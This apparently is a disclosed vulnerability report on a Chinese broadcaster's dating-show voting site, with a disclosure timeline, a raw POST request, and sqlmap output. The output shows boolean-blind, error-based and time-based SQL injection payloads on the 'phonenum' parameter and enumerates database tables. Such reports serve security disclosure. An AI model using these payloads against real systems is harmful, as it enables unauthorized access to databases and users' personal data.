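2015-12-10: Details reported to the vendor; awaiting vendor response
2015-12-14: Vendor confirmed; details disclosed to the vendor only
2015-12-24: Details disclosed to core white hats and experts in related fields
2016-01-03: Details disclosed to regular white hats
2016-01-13: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public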
The "星梦奇缘" event (hereinafter "the event") is a large-scale urban singles dating reality show organized by Suzhou Broadcasting System (苏州广播电视总台).
POST /home/dovote HTTP/1.1
Content-Length: 311
Content-Type: application/x-www-form-urlencoded
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2248440621c7a6c09b4b066b32a7931191%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22124.114.77.200%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1449635229%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Def6e45bd30510dca5b1b4ee805bc92e6; AJSTAT_ok_pages=2; AJSTAT_ok_times=1
Host: love.csztv.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

code=94102&phonenum=1&pid=0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: phonenum (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: code=94102&phonenum=(SELECT (CASE WHEN (5354=5354) THEN 5354 ELSE 5354*(SELECT 5354 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&pid=0

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: code=94102&phonenum=1 AND (SELECT 8648 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(8648=8648,1))),0x716a707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&pid=0

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: code=94102&phonenum=1 AND (SELECT * FROM (SELECT(SLEEP(5)))PQyO)&pid=0
---
web server operating system: Windows or Linux 7 or Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0
Database: lubb
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| ht_vote_back  | 264534  |
| ht_capta      | 40409   |
| wy_capta      | 18659   |
| wy_vote       | 17292   |
| xm_userinfo   | 1759    |
| xm_capta      | 217     |
| xm_vote       | 199     |
| xm_review     | 150     |
| xm_person     | 122     |
| pi_infomation | 108     |
| xm_image      | 61      |
| ht_candidate  | 55      |
| lotels        | 42      |
| wy_student    | 30      |
| ht_option     | 10      |
| userinfo      | 3       |
| ht_action     | 1       |
| pi_user       | 1       |
| wy_action     | 1       |
| xm_action     | 1       |
| xm_user       | 1       |
+---------------+---------+
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2015-12-14 20:19
Already decommissioned
None yet